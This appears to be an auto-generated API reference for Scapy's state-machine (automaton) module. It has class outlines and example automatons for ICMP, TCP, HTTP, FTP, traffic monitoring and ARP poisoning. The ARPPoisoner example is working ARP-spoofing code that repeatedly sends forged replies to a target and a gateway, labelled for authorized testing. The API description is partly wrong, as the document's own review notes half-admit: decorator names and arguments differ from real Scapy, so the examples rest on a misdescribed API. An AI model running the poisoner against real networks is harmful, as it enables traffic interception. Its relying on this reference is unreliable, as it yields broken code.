Interactive packet manipulation program and library for network security research and testing
—
State machine framework for building automated network protocols, responding to network events, and creating interactive network services and attack simulations.
Core state machine class for building automated network behaviors and protocol implementations.
class Automaton:
    """Base class for creating network protocol automatons.

    API outline only: each method below carries its documentation and no
    implementation.
    """

    def __init__(self, *args, **kwargs):
        """Initialize the automaton.

        Parameters:
        - *args: Positional arguments
        - **kwargs: Keyword arguments for configuration
        """

    def start(self) -> None:
        """Start the automaton execution."""

    def stop(self) -> None:
        """Stop the automaton execution."""

    def restart(self) -> None:
        """Restart the automaton from its initial state."""

    def run(self, resume: int = 0, timeout: float = None) -> None:
        """Run the automaton, optionally bounded by a timeout.

        Parameters:
        - resume: Resume from specific point
        - timeout: Maximum runtime in seconds
        """

    def runbg(self, resume: int = 0, timeout: float = None) -> None:
        """Run the automaton in a background thread.

        Parameters:
        - resume: Resume from specific point
        - timeout: Maximum runtime in seconds
        """

    # "Packet" is written as a forward reference: no import precedes this
    # outline, so a bare name would fail when the class body is evaluated.
    def send(self, pkt: "Packet") -> None:
        """Send a packet from the automaton.

        Parameters:
        - pkt: Packet to send
        """

    def receive(self, pkt: "Packet") -> None:
        """Process a received packet in the automaton.

        Parameters:
        - pkt: Received packet
        """


# Decorators for defining automaton states, transitions, and behaviors.
class ATMT:
    """Automaton decorators and utilities for state machine definition.

    API outline only: each method below carries its documentation and no
    implementation.

    NOTE(review): upstream Scapy appears to spell the receive decorator
    ``ATMT.receive_condition`` and to have ``ATMT.action`` take a condition
    rather than a state -- confirm against the installed Scapy version.
    """

    @staticmethod
    def state(initial: bool = False, final: bool = False, error: bool = False):
        """Define an automaton state.

        Parameters:
        - initial: Mark as initial state
        - final: Mark as final state
        - error: Mark as error state

        Returns:
        decorator: State decorator function
        """

    @staticmethod
    def action(func: callable):
        """Define an action to execute when entering a state.

        Parameters:
        - func: The state the action is attached to; the examples in this
          document pass a state here (``@ATMT.action(RESPONDING)``) and
          decorate the action function with the result

        Returns:
        decorator: Action decorator
        """

    @staticmethod
    def condition(func: callable, prio: int = 0):
        """Define a condition for a state transition.

        Parameters:
        - func: Presumably the state the condition is evaluated in, as with
          ``receive`` -- TODO confirm
        - prio: Priority for condition evaluation

        Returns:
        decorator: Condition decorator
        """

    @staticmethod
    def receive(func: callable, prio: int = 0):
        """Define a packet receive handler.

        Parameters:
        - func: The state in which packets are handled; the examples in this
          document pass a state here (``@ATMT.receive(WAITING)``) and
          decorate the handler function with the result
        - prio: Priority for receive handler

        Returns:
        decorator: Receive decorator
        """

    @staticmethod
    def timeout(func: callable, timeout: float):
        """Define a timeout handler for a state.

        Parameters:
        - func: The state the timeout applies to; the examples in this
          document pass a state here (``@ATMT.timeout(SYN_SENT, 5)``) and
          decorate the handler function with the result
        - timeout: Timeout value in seconds

        Returns:
        decorator: Timeout decorator
        """

    @staticmethod
    def ioevent(func: callable, name: str, as_supersocket: bool = False):
        """Define an I/O event handler.

        Parameters:
        - func: Presumably the state the event is handled in, as with
          ``receive`` -- TODO confirm
        - name: Event name
        - as_supersocket: Treat as supersocket event

        Returns:
        decorator: I/O event decorator
        """


# Pre-built automatons for common network protocols and responses.
class ARP_am(Automaton):
    """Answering machine that replies to ARP requests."""

    def __init__(self, iface: str = None, **kwargs):
        """Set up the ARP answering machine.

        Parameters:
        - iface: Interface to monitor
        - **kwargs: Additional configuration
        """
class ICMP_am(Automaton):
    """Answering machine that produces ping (ICMP) responses."""

    def __init__(self, iface: str = None, **kwargs):
        """Set up the ICMP answering machine.

        Parameters:
        - iface: Interface to monitor
        - **kwargs: Additional configuration
        """
class DHCPServer_am(Automaton):
    """Answering machine acting as a DHCP server."""

    def __init__(
        self,
        iface: str = None,
        pool: str = "192.168.1.100-192.168.1.200",
        **kwargs,
    ):
        """Set up the DHCP server.

        Parameters:
        - iface: Interface to serve DHCP on
        - pool: IP address pool for allocation
        - **kwargs: Additional DHCP configuration
        """
class DNS_am(Automaton):
    """Answering machine acting as a DNS server."""

    def __init__(self, iface: str = None, records: dict = None, **kwargs):
        """Set up the DNS server.

        Parameters:
        - iface: Interface to monitor
        - records: DNS records to serve
        - **kwargs: Additional configuration
        """


# Client-side automatons for automated protocol interactions.
class TCP_client(Automaton):
    """Client automaton for automated TCP connections."""

    def __init__(self, ip: str, port: int, **kwargs):
        """Set up the TCP client.

        Parameters:
        - ip: Target IP address
        - port: Target port
        - **kwargs: Additional TCP options
        """
class HTTP_client(Automaton):
    """Client automaton for issuing web (HTTP) requests."""

    def __init__(self, host: str, port: int = 80, **kwargs):
        """Set up the HTTP client.

        Parameters:
        - host: Target hostname
        - port: Target port
        - **kwargs: Additional HTTP options
        """
class SMTP_client(Automaton):
    """Client automaton for sending email over SMTP."""

    def __init__(self, server: str, port: int = 25, **kwargs):
        """Set up the SMTP client.

        Parameters:
        - server: SMTP server address
        - port: SMTP server port
        - **kwargs: Additional SMTP options
        """


from scapy.all import *
class SimpleResponder(Automaton):
    """Simple automaton that responds to ICMP pings."""

    @ATMT.state(initial=True)
    def WAITING(self):
        """Initial waiting state."""
        print("Waiting for ICMP packets...")

    @ATMT.receive(WAITING)
    def receive_icmp(self, pkt):
        """Store an incoming echo request and switch to RESPONDING.

        Parameters:
        - pkt: Received packet; ignored unless it is an ICMP echo request
          carried over IP
        """
        # The reply is addressed from pkt[IP], so require that layer too.
        if not (pkt.haslayer(IP) and pkt.haslayer(ICMP)):
            return
        if pkt[ICMP].type == 8:  # Echo request
            print(f"Received ping from {pkt[IP].src}")
            self.icmp_request = pkt
            raise self.RESPONDING()

    @ATMT.state()
    def RESPONDING(self):
        """State for sending ICMP reply."""
        pass

    @ATMT.action(RESPONDING)
    def send_reply(self):
        """Send the echo reply for the stored request, then wait again."""
        request = self.icmp_request
        # Parentheses replace the backslash continuation of the original.
        reply = (
            IP(dst=request[IP].src, src=request[IP].dst)
            / ICMP(type=0, id=request[ICMP].id, seq=request[ICMP].seq)
        )
        # An echo reply must return the data carried by the request.
        data = bytes(request[ICMP].payload)
        if data:
            reply = reply / Raw(load=data)
        self.send(reply)
        print(f"Sent reply to {request[IP].src}")
        raise self.WAITING()


# Start the automaton
responder = SimpleResponder()
responder.runbg()


class TCPConnector(Automaton):
    """Automaton that establishes TCP connections."""

    def __init__(self, target_ip: str, target_port: int):
        """Pick a random source port and initial sequence number.

        Parameters:
        - target_ip: Address the SYN is sent to
        - target_port: TCP port the SYN is sent to
        """
        # Imported here so the example does not rely on `random` leaking in
        # through the star import.
        import random

        super().__init__()
        self.target_ip = target_ip
        self.target_port = target_port
        self.src_port = random.randint(1024, 65535)
        self.seq = random.randint(0, 2**32 - 1)

    @ATMT.state(initial=True)
    def CLOSED(self):
        """Initial closed state."""
        pass

    @ATMT.action(CLOSED)
    def send_syn(self):
        """Send the TCP SYN packet and move to SYN_SENT."""
        syn = IP(dst=self.target_ip) / TCP(
            sport=self.src_port,
            dport=self.target_port,
            flags="S",
            seq=self.seq,
        )
        self.send(syn)
        print(f"Sent SYN to {self.target_ip}:{self.target_port}")
        raise self.SYN_SENT()

    @ATMT.state()
    def SYN_SENT(self):
        """Waiting for SYN-ACK."""
        pass

    @ATMT.receive(SYN_SENT)
    def receive_synack(self, pkt):
        """Accept the SYN-ACK that answers our SYN and move to ESTABLISHED.

        Parameters:
        - pkt: Received packet; ignored unless it is a SYN-ACK between the
          target port and our source port that acknowledges our SYN
        """
        if not pkt.haslayer(TCP):
            return
        tcp = pkt[TCP]
        # Sequence numbers are 32-bit, so ISN + 1 must wrap around.
        expected_ack = (self.seq + 1) & 0xFFFFFFFF
        if (
            tcp.flags == 18  # SYN-ACK
            and tcp.dport == self.src_port
            and tcp.sport == self.target_port
            and tcp.ack == expected_ack
        ):
            self.ack_seq = (tcp.seq + 1) & 0xFFFFFFFF
            raise self.ESTABLISHED()

    @ATMT.timeout(SYN_SENT, 5)
    def syn_timeout(self):
        """Handle SYN timeout by returning to CLOSED."""
        print("SYN timeout - connection failed")
        raise self.CLOSED()

    @ATMT.state()
    def ESTABLISHED(self):
        """Connection established state."""
        pass

    @ATMT.action(ESTABLISHED)
    def send_ack(self):
        """Send the ACK that completes the handshake."""
        ack = IP(dst=self.target_ip) / TCP(
            sport=self.src_port,
            dport=self.target_port,
            flags="A",
            # Wrap to 32 bits: self.seq may already be 2**32 - 1.
            seq=(self.seq + 1) & 0xFFFFFFFF,
            ack=self.ack_seq,
        )
        self.send(ack)
        print(f"Connection established with {self.target_ip}:{self.target_port}")


# Use the automaton
connector = TCPConnector("192.168.1.1", 80)
connector.run(timeout=10)


class SimpleHTTPServer(Automaton):
    """Simple HTTP server automaton."""

    def __init__(self, port: int = 8080):
        """Remember the port to answer on.

        Parameters:
        - port: TCP port requests must be addressed to
        """
        super().__init__()
        self.port = port
        self.connections = {}

    @ATMT.state(initial=True)
    def LISTENING(self):
        """Listening for HTTP requests."""
        print(f"HTTP server listening on port {self.port}")

    @ATMT.receive(LISTENING)
    def receive_http(self, pkt):
        """Record the peer details of a GET request and move to RESPONDING.

        Parameters:
        - pkt: Received packet; ignored unless it is TCP data for our port
          whose payload contains b"GET"
        """
        if not (pkt.haslayer(TCP) and pkt.haslayer(Raw)):
            return
        if pkt[TCP].dport == self.port and b"GET" in pkt[Raw].load:
            self.client_ip = pkt[IP].src
            self.client_port = pkt[TCP].sport
            # Our next sequence number is whatever the client acknowledged.
            self.server_seq = pkt[TCP].ack
            self.client_seq = pkt[TCP].seq + len(pkt[Raw].load)
            print(f"HTTP request from {self.client_ip}:{self.client_port}")
            raise self.RESPONDING()

    @ATMT.state()
    def RESPONDING(self):
        """Sending HTTP response."""
        pass

    @ATMT.action(RESPONDING)
    def send_response(self):
        """Send the fixed HTML page, then go back to LISTENING."""
        body = b"<h1>Hello from Scapy!</h1>"
        # Real CRLF line endings, and a Content-Length derived from the body
        # so the header can never disagree with the payload.
        header = b"\r\n".join([
            b"HTTP/1.1 200 OK",
            b"Content-Type: text/html",
            b"Content-Length: %d" % len(body),
        ])
        response_data = header + b"\r\n\r\n" + body
        response = (
            IP(dst=self.client_ip)
            / TCP(
                sport=self.port,
                dport=self.client_port,
                flags="PA",
                seq=self.server_seq,
                ack=self.client_seq,
            )
            / Raw(response_data)
        )
        self.send(response)
        print(f"Sent HTTP response to {self.client_ip}:{self.client_port}")
        raise self.LISTENING()


# Start HTTP server
server = SimpleHTTPServer(port=8080)
server.runbg()


class ARPPoisoner(Automaton):
    """ARP poisoning attack automaton (authorized testing only)."""

    def __init__(self, target_ip: str, gateway_ip: str):
        """Record both addresses and the MAC of the default interface.

        Parameters:
        - target_ip: Address of the target host
        - gateway_ip: Address of the gateway
        """
        super().__init__()
        self.target_ip = target_ip
        self.gateway_ip = gateway_ip
        self.attacker_mac = get_if_hwaddr(conf.iface)

    @ATMT.state(initial=True)
    def POISONING(self):
        """Single state of the automaton; re-entered every cycle."""
        pass

    @ATMT.action(POISONING)
    def send_poison(self):
        """Send one ARP reply towards the target and one towards the gateway."""
        broadcast = "ff:ff:ff:ff:ff:ff"
        # (destination, claimed sender): target first, then gateway.
        pairs = (
            (self.target_ip, self.gateway_ip),
            (self.gateway_ip, self.target_ip),
        )
        replies = [
            ARP(op=2, pdst=dest, hwdst=broadcast,
                psrc=claimed, hwsrc=self.attacker_mac)
            for dest, claimed in pairs
        ]
        for arp_reply in replies:
            sendp(arp_reply, verbose=0)
        print(f"Sent ARP poison: {self.target_ip} <-> {self.gateway_ip}")

    @ATMT.timeout(POISONING, 5)
    def repeat_poison(self):
        """Re-enter POISONING after the 5 second timeout."""
        raise self.POISONING()


# WARNING: Only use for authorized testing!
# poisoner = ARPPoisoner("192.168.1.100", "192.168.1.1")
# poisoner.runbg()


class FTPClient(Automaton):
    """FTP client automaton with authentication."""

    def __init__(self, server: str, username: str, password: str):
        """Store the login details.

        Parameters:
        - server: FTP server address
        - username: Name sent with the USER command
        - password: Password sent with the PASS command
        """
        super().__init__()
        self.server = server
        self.username = username
        self.password = password
        self.port = 21

    @ATMT.state(initial=True)
    def CONNECTING(self):
        """Connecting to FTP server."""
        print(f"Connecting to FTP server {self.server}")

    @ATMT.action(CONNECTING)
    def connect(self):
        """Send the TCP SYN and move to CONNECTED."""
        syn = IP(dst=self.server) / TCP(dport=self.port, flags="S")
        self.send(syn)
        raise self.CONNECTED()

    @ATMT.state()
    def CONNECTED(self):
        """Connected, waiting for welcome message."""
        pass

    @ATMT.receive(CONNECTED)
    def receive_welcome(self, pkt):
        """Move to AUTHENTICATING once the 220 greeting arrives.

        Parameters:
        - pkt: Received packet; ignored unless its payload starts with 220
        """
        # Reply codes lead the line; matching anywhere would also accept
        # unrelated payloads that merely contain the digits.
        if pkt.haslayer(Raw) and pkt[Raw].load.startswith(b"220"):
            print("Received FTP welcome message")
            raise self.AUTHENTICATING()

    @ATMT.state()
    def AUTHENTICATING(self):
        """Sending authentication."""
        pass

    @ATMT.action(AUTHENTICATING)
    def send_username(self):
        """Send the USER command and move to USERNAME_SENT."""
        user_cmd = f"USER {self.username}\r\n".encode()
        cmd_pkt = IP(dst=self.server) / TCP(dport=self.port) / Raw(user_cmd)
        self.send(cmd_pkt)
        print(f"Sent username: {self.username}")
        raise self.USERNAME_SENT()

    @ATMT.state()
    def USERNAME_SENT(self):
        """Username sent, waiting for password prompt."""
        pass

    @ATMT.receive(USERNAME_SENT)
    def receive_pass_prompt(self, pkt):
        """Answer the 331 password prompt with the PASS command.

        Parameters:
        - pkt: Received packet; ignored unless its payload starts with 331
        """
        if pkt.haslayer(Raw) and pkt[Raw].load.startswith(b"331"):
            pass_cmd = f"PASS {self.password}\r\n".encode()
            cmd_pkt = IP(dst=self.server) / TCP(dport=self.port) / Raw(pass_cmd)
            self.send(cmd_pkt)
            print("Sent password")
            # Wait for the server's verdict instead of assuming success.
            raise self.PASSWORD_SENT()

    @ATMT.state()
    def PASSWORD_SENT(self):
        """Password sent, waiting for the login result."""
        pass

    @ATMT.receive(PASSWORD_SENT)
    def receive_login_result(self, pkt):
        """Move to AUTHENTICATED once the server confirms with 230.

        Parameters:
        - pkt: Received packet; ignored unless its payload starts with 230
        """
        if pkt.haslayer(Raw) and pkt[Raw].load.startswith(b"230"):
            raise self.AUTHENTICATED()

    @ATMT.state(final=True)
    def AUTHENTICATED(self):
        """Successfully authenticated."""
        print("FTP authentication successful!")


# Use FTP client
# ftp = FTPClient("ftp.example.com", "testuser", "testpass")
# ftp.run(timeout=30)


class NetworkMonitor(Automaton):
    """Network monitoring automaton with alerts."""

    def __init__(self, syn_threshold: int = 100):
        """Create empty tracking state.

        Parameters:
        - syn_threshold: Number of SYN packets from one source that must be
          exceeded before an alert is raised
        """
        super().__init__()
        self.syn_threshold = syn_threshold
        self.suspicious_ips = set()
        self.connection_counts = {}

    @ATMT.state(initial=True)
    def MONITORING(self):
        """Continuously monitor network traffic."""
        print("Starting network monitoring...")

    @ATMT.receive(MONITORING)
    def analyze_packet(self, pkt):
        """Count connection attempts per source and flag heavy senders.

        Parameters:
        - pkt: Received packet; only TCP-over-IP packets whose flags equal
          SYN are counted
        """
        if not (pkt.haslayer(IP) and pkt.haslayer(TCP)):
            return
        # Count SYNs only: counting every packet would flag any busy host
        # on its first SYN.
        if pkt[TCP].flags == 2:  # SYN packet
            src_ip = pkt[IP].src
            seen = self.connection_counts.get(src_ip, 0) + 1
            self.connection_counts[src_ip] = seen
            # Alert once per source address.
            if seen > self.syn_threshold and src_ip not in self.suspicious_ips:
                self.suspicious_ips.add(src_ip)
                self.alert_ip = src_ip
                raise self.ALERT()

    @ATMT.state()
    def ALERT(self):
        """Generate security alert."""
        pass

    @ATMT.action(ALERT)
    def generate_alert(self):
        """Print the alert for the flagged address, then resume monitoring."""
        print(f"SECURITY ALERT: Possible port scan from {self.alert_ip}")
        print(f"Connection count: {self.connection_counts[self.alert_ip]}")
        # Could send notification, write to log, etc.
        raise self.MONITORING()

    @ATMT.timeout(MONITORING, 60)
    def reset_counters(self):
        """Clear the per-source counters after the 60 second timeout."""
        self.connection_counts.clear()
        print("Reset connection counters")
        raise self.MONITORING()


# Start network monitor
# monitor = NetworkMonitor()
# monitor.runbg()

Install with Tessl CLI:
npx tessl i tessl/pypi-scapy